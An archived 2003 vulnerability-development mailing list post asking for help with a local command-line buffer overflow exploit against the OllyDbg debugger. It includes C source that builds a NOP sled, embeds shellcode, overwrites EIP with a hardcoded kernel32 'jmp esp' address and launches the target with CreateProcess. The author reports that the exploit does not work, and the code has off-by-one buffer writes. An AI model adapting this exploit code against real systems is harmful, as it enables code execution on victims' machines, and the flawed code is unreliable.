Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

win32 command line overflows: (ex: ollydbg.exe)

From: "wirepair" <wirepair () roguemail net>
Date: Thu, 05 Jun 2003 05:24:45 -0700
Hello all, Just messing around with win32 overflows, and i've run into a small problem with command line overflows. Ollydbg has a buffer overflow when you call a program with a large command line. (I found this when trying to debug rasphone.exe in WinXP (rasphone -f <1000'a>) I was expecting Ollydbg to run the program but it crashed itself "Error in Instruction 0x41414141 while trying to 'read' 0x41414141. So I tried to write an exploit for Ollydbg. Issue #2 Visual C++ crashes as well when i'm trying to debug ollydbg so I have to do this blindly. My exploit buffer looks like: ollydbg.exe ollydbg.exe <200 NOPS>Shellcode<more nops>[&EIP]<nops> I'm trying to use CreateProcess to call ollydbg.exe but it doesn't do anything, no crash no nothing. So i saved the exploit buffer to a file and tried to 'paste' it (heh). It doesn't crash even though there are over 600 characters... (Ollydbg.exe overwrites EIP at 508-511, i think i can't debug it!) Anyways here's my code any insite on why this isn't working is greatly appreciated: 
#include <windows.h>
#include <stdio.h>
#include <string.h>


int main(int argc, char **argv) {
        char exp_buff[1024];
        int x,i;
        char ollyfile[100];
DWORD jmpesp = 0x77E9AE59; // jmp esp call in kernel32.dll unsigned char shellcode[19] = "\xC7\x45\xFD\x63\x6D\x64\x20\x8D\x45\xFD\x50\xB8\x35\xFD\xE6\x77\xFF\xD0"; //tiny sc 
        PROCESS_INFORMATION pi;
        STARTUPINFO si;

        if (argc != 2) {
                fprintf(stderr, "heh: %s <path to olly>\n", argv[0]);
                exit(1);
        }
        strncpy(ollyfile, argv[1], 99);
        ollyfile[100] = 0x00;
        
        x = strlen(ollyfile);
memset(exp_buff, 0x90, 1024); memcpy(exp_buff, ollyfile, x); 
        exp_buff[x] = ' ';

        memcpy(exp_buff+200, &shellcode, 19);
        exp_buff[218] = 0x90;
        for (i = 219; i <= 508; i++) {
                exp_buff[i] = 0x90;
        }
        exp_buff[1024] = 0x00;
        memcpy(exp_buff+508, &jmpesp, 4);
        fprintf(stderr, "%s", exp_buff); //debugging heh
CreateProcess("E:\\ollydbg\\ollydbg.exe", exp_buff, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); 
        
        return(0);
}

Thanks
-wire
_____________________________
For the best comics, toys, movies, and more,
please visit <http://www.tfaw.com/?qt=wmf>
Previous By Date Next
Previous By Thread Next

Current thread: